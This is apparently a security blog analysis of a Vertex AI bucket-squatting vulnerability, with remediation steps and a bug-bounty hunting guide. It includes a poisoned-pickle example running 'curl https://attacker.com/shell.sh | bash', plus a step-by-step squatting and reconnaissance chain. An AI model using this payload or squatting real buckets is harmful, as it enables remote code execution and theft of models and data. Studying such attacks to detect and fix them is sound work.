CVE-2026-2473: GCP Vertex AI Bucket Squatting Enables Cross-Tenant RCE and Model Theft (CVSS 9.8)

Published: February 22, 2026 | Severity: Critical | CVSS Score: 9.8 | GCP Bulletin: gcp-2026-012

Executive Summary

Google has patched a critical vulnerability in Google Cloud Vertex AI Experiments that allowed unauthenticated attackers to break cloud tenant isolation without exploiting a single line of Vertex AI's code. The attack — a technique known as bucket squatting — required only a free-tier GCP account and knowledge of a target's project ID.

Tracked as CVE-2026-2473 (CVSS 9.8 Critical), the vulnerability existed in all Vertex AI Experiments versions from 1.21.0 up to 1.133.0. An attacker could pre-register a victim's predictably named Cloud Storage bucket in their own project before the victim ever ran an experiment. From that moment on, every model the victim trained, every dataset they wrote, and every artifact they produced flowed into attacker-controlled storage — enabling model theft, training data poisoning, and remote code execution via poisoned pickle files loaded at inference time.

Google deployed a server-side fix (Vertex AI ≥1.133.0 now generates cryptographically random bucket names), and no customer action is required for the service itself. But if your organisation ran Vertex AI Experiments between versions 1.21.0 and 1.133.0, your historical experiment buckets deserve a forensic review.

For bug bounty hunters: this vulnerability is a textbook example of a cloud-native attack class — predictable resource naming leading to tenant isolation bypass — that generalises directly to AWS SageMaker, Azure ML, Databricks, and every other platform that auto-provisions storage with deterministic names.

CVSS 9.8 Breakdown: Why This Scores So High

CVE-2026-2473 achieves a 9.8 CVSS v3.0 score because every component lines up for maximum exploitability:

Attack Vector (AV:N): Network — fully exploitable over the internet. No physical or local access required.
Attack Complexity (AC:L): Low — the bucket naming pattern is deterministic and documentable. Given a project ID, anyone can compute the target bucket name.
Privileges Required (PR:N): None — a free-tier GCP account is sufficient to register a bucket in your own project. No access to the victim's GCP environment whatsoever.
User Interaction (UI:N): None — the victim simply runs their normal Vertex AI Experiment workflow. There is no malicious link to click, no file to open. Their own SDK sends data to the wrong bucket automatically.
Confidentiality (C:H): High — trained model weights, hyperparameters, training datasets, and experiment metadata are all exfiltrated to attacker-controlled storage.
Integrity (I:H): High — the attacker can write poisoned artifacts (model files, configuration) back into the squatted bucket, which the victim's inference pipeline then loads and executes.
Availability (A:H): High — the attacker can delete or corrupt artifacts in the squatted bucket, disrupting the victim's entire ML pipeline.

The only reason this isn't CVSS 10.0 is that Scope is Unchanged (S:U) — the attacker's impact stays within the victim's data plane rather than escaping to the broader GCP control plane. But for an AI/ML organisation, theft of your proprietary models and the ability to execute code in your inference environment is catastrophic enough.

Technical Deep-Dive: The Bucket Squatting Attack

Root Cause: CWE-340 — Predictable Identifiers

When you initialise a Vertex AI Experiment, the SDK automatically creates a Cloud Storage bucket to store experiment artifacts: model checkpoints, evaluation metrics, TensorBoard logs, and serialised model objects. The bucket name was generated using a deterministic formula based on your GCP project ID and region — two values that are rarely secret.

In Google Cloud Storage, bucket names are globally unique. This means that if an attacker registers a bucket with your predicted name in their own GCP project before you run your first experiment, your Vertex AI SDK will find the bucket already exists, assume it's yours, and start writing to it. No authentication check. No ownership verification. Just a name lookup.

Attack Chain: Step by Step

Target reconnaissance: Identify the victim's GCP project ID. This is often exposed in public GitHub repositories (GKE configs, Terraform state files, `gcloud` command history), GCP metadata endpoints on misconfigured compute instances, or simply the GCP Resource Manager API which lists projects for accounts with domain-wide delegation.
Predict the bucket name: Using the known naming formula for Vertex AI Experiments, compute the exact bucket name the victim's SDK will attempt to create. The pattern followed the format {project-id}-aiplatform-{region}-experiments with minor variations documented in the SDK source code.
Squat the bucket: Register that exact bucket name in your own free-tier GCP account. This costs nothing and takes seconds. GCS bucket registration is instantaneous and globally propagated.
Wait: When the victim next runs a Vertex AI Experiment, their SDK calls the GCS API to create its bucket — receives a "bucket already exists" response — and assumes the bucket is legitimately theirs. The SDK proceeds to write all experiment artifacts into the attacker-controlled bucket.
Harvest and poison: The attacker now has bidirectional access. Read paths exfiltrate the victim's model weights, training data, and hyperparameters. Write paths allow injecting poisoned model artifacts back into the bucket, which the victim's inference pipeline will load — and execute — during model serving.

Remote Code Execution via Pickle Deserialization

The most severe exploitation path flows through Python's pickle serialisation format, which Vertex AI and most ML frameworks use for saving model objects. A pickle file is not a static data format — it is executable bytecode. When your inference code calls pickle.load() on an attacker-controlled file, that file's embedded __reduce__ method executes arbitrary Python code in the context of your serving process.

# Example: what a poisoned pickle looks like
import pickle, os

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('curl https://attacker.com/shell.sh | bash',))

# Attacker writes this to the squatted bucket as model.pkl
with open('model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

When the victim's serving code calls model = pickle.load(open('model.pkl', 'rb')), the reverse shell executes. No CVE in the serving framework required — this is Python by design, weaponised by controlling the source file.

How to Hunt This Pattern Across Cloud Platforms

CVE-2026-2473 is the first documented instance of this class in Vertex AI, but the underlying pattern — predictable cloud resource naming enabling pre-registration attacks — exists across every major cloud ML platform. Here is where to look:

AWS SageMaker

SageMaker creates a default S3 bucket named sagemaker-{region}-{aws-account-id}. AWS account IDs are 12-digit numbers that are frequently exposed in IAM ARNs, CloudFormation templates, and public S3 bucket policies. If you can enumerate a target's account ID, you can squat their SageMaker default bucket before they run their first training job. Test this on your own AWS account to understand the attack surface before looking for it in bug bounty targets.

Azure Machine Learning

Azure ML Workspaces provision Azure Blob Storage accounts with names partially derived from the workspace name and resource group. Older workspaces used shorter random suffixes (4-6 hex characters) that are feasibly brutable. Check for workspaces where the storage account name is discoverable via Azure Resource Graph Explorer with read permissions on the subscription.

Databricks

Databricks MLflow stores artifacts at paths specified in the tracking server configuration. In many deployments, the artifact root URI is stored in plaintext in MLflow experiment metadata, accessible to any authenticated Databricks user. Cross-workspace artifact path collisions can occur when workspace names follow predictable corporate naming conventions.

Hugging Face

The Hugging Face Hub uses deterministic model repository paths based on username and model name. While not a bucket squatting scenario, namespace squatting (registering corp-name/model-name before the legitimate organisation) can redirect users who clone a model by name rather than pinned commit SHA.

Detection and Hunting Tools

For bug bounty researchers investigating cloud misconfigurations like CVE-2026-2473, Burp Suite Professional remains the gold standard for intercepting and analysing cloud API calls during testing. Capturing the GCS bucket creation requests during SDK initialisation reveals the exact naming convention in real time.

For cloud-specific reconnaissance and misconfiguration scanning, Hacking the Cloud: Offensive Security for Cloud Environments provides comprehensive methodology for bucket enumeration, IAM privilege escalation, and cross-tenant attack chains that apply directly to this vulnerability class.

Detection: Was Your Vertex AI Environment Squatted?

Indicators that a Vertex AI Experiments bucket may have been squatted:

GCS Bucket Ownership Verification

# List your Vertex AI experiment buckets
gcloud storage buckets list --filter="name~aiplatform.*experiments"

# Check creation time vs first experiment run
gcloud storage buckets describe gs://YOUR-BUCKET-NAME --format="json(timeCreated,updated)"

# If bucket creation time PRECEDES your first gcloud/SDK run, investigate ownership
# A legitimately created bucket should be created by your service account or project

# Verify IAM on the bucket
gsutil iam get gs://YOUR-BUCKET-NAME
# If you are NOT listed as owner/creator, the bucket may be squatted

Cloud Audit Logs

Query GCS Data Access audit logs for your experiment bucket
Look for read/write operations from principals outside your GCP project
Unexpected storage.objects.create events from external project service accounts are a red flag
Check Cloud Logging: resource.type="gcs_bucket" protoPayload.resourceName=YOUR-BUCKET

Model Integrity Verification

Hash all model artifacts before loading: compare against expected checksums from your training run
Never load pickle files from untrusted storage — use safetensors or ONNX formats which do not execute code on load
Implement model signing: use Google Cloud KMS to sign model artifacts at training time and verify at serving time

For hands-on investigation of cloud storage anomalies, The Web Application Hacker's Handbook (2nd Edition) covers the cloud API enumeration techniques essential for hunting this class of vulnerability, including storage API abuse patterns.

Remediation and Defence

Immediate Actions (All Vertex AI Users)

Verify Vertex AI SDK version: Ensure you are running Vertex AI Python SDK ≥1.133.0, which uses cryptographically random bucket names. Run pip show google-cloud-aiplatform to check.
Audit existing experiment buckets: Run the GCS ownership verification commands above. If any bucket was created before your first experiment run, investigate.
Review model provenance: For all models trained using Vertex AI Experiments in the vulnerable window, validate model artifact hashes against your training job logs.
Assume breach if bucket ownership is unclear: Retrain affected models from verified clean training data. Rotate any credentials that were stored in or accessible from the experiment environment.

Long-Term Defences Against Predictable Resource Naming

Enforce cryptographically random suffixes for all auto-provisioned cloud storage resources in your IaC templates (Terraform, CDK)
Lock down GCS bucket creation via org-level IAM constraints: constraints/storage.restrictBucketCreation prevents resources from being created outside your org
Use safetensors instead of pickle for all model serialisation — safetensors is a pure data format with no execution capabilities
Implement model signing in your MLOps pipeline: sign artifacts with Cloud KMS at training time, verify at deploy time
Enable VPC Service Controls around Vertex AI: restricts API access to authorised networks and prevents cross-project bucket access

For building robust cloud security testing labs to safely reproduce vulnerabilities like CVE-2026-2473, a Raspberry Pi 5 Starter Kit provides an isolated environment for running GCP SDK experiments without risking production credentials.

Bug Bounty Hunting Guide: Finding Bucket Squatting in Cloud ML Platforms

CVE-2026-2473 was reported to Google and patched — but the class of vulnerability exists across dozens of platforms. Here is how to hunt it systematically:

Step 1: Enumerate Target Cloud Projects

GCP project IDs are the key input. Find them in:

GitHub repositories: search for project_id, GOOGLE_CLOUD_PROJECT, GCP_PROJECT in public repos belonging to the target organisation
GKE cluster metadata endpoints (http://metadata.google.internal/computeMetadata/v1/project/project-id) if you have SSRF access
GCP audit log exports to public BigQuery datasets (misconfiguration)
Terraform state files accidentally committed to public repos

Step 2: Predict Resource Names

Study the SDK source code for each cloud ML platform to understand naming conventions. For GCS specifically, bucket names must be globally unique and follow a specific format. The naming pattern is typically in the SDK's setup/initialisation functions.

Step 3: Attempt Pre-Registration (On Your Own Infrastructure)

Never squat a bucket belonging to a real organisation — that crosses from research into actual attack. Instead: report the naming pattern vulnerability directly to the vendor's bug bounty program with a demonstration on your own test project. Most cloud providers have bug bounty programs (Google VRP, AWS Bug Bounty) and pay well for tenant isolation bypasses.

Step 4: Document the Impact Chain

The most compelling bug reports for this class demonstrate the full impact: not just "I can register a bucket with this name" but "here is the complete chain from bucket registration to model theft to RCE via pickle deserialization in a test environment." High-quality PoCs in this space regularly earn $10,000–$50,000+ on Google VRP.

The Hacker Playbook 3: Practical Guide to Penetration Testing is essential for understanding how to construct and document multi-step attack chains like the one in CVE-2026-2473 — a skill that directly translates to high-value bug bounty reports.

Disclosure Timeline

Discovery: Vertex AI Experiments predictable bucket naming identified (date not disclosed)
Private disclosure to Google: Via Google Vulnerability Reward Program
Server-side fix deployed: Vertex AI SDK ≥1.133.0 — bucket names now cryptographically random
February 20, 2026: CVE-2026-2473 publicly disclosed via NVD; GCP Security Bulletin gcp-2026-012 published
February 22, 2026: This analysis published

Google's advisory notes that "no customer action is needed" for the patched service. However, organisations that ran Vertex AI Experiments during the vulnerable window should conduct the forensic review described in the Detection section above.

Conclusion: The Predictable Cloud Resource Attack Class

CVE-2026-2473 is significant not because it exploits a complex technical flaw — but because it exploits a design assumption that permeates cloud architecture: the belief that auto-generated resource names are private. In a globally shared namespace like Google Cloud Storage, "predictable" equals "squattable," and "squattable" equals "cross-tenant."

The fact that this was silently exploitable in Google Cloud's own flagship AI platform — a service handling proprietary models for enterprises worldwide — with nothing more than a free-tier account and a known project ID, should prompt every cloud architect to audit their own resource naming conventions today.

For bug bounty hunters: the technique documented here is reproducible and untested across large portions of the cloud ML ecosystem. AWS SageMaker, Azure ML, and Databricks all auto-provision storage with partially predictable names. This is a research area with significant undiscovered bounty potential — and the attack impact (model theft + RCE) puts it firmly in critical tier for any platform that validates it.

Quick action checklist:

✅ Upgrade Vertex AI Python SDK to ≥1.133.0
✅ Audit existing experiment bucket ownership via GCS IAM
✅ Verify model artifact hashes against training job logs
✅ Switch from pickle to safetensors for model serialisation
✅ Implement model signing with Cloud KMS
✅ Enable VPC Service Controls around Vertex AI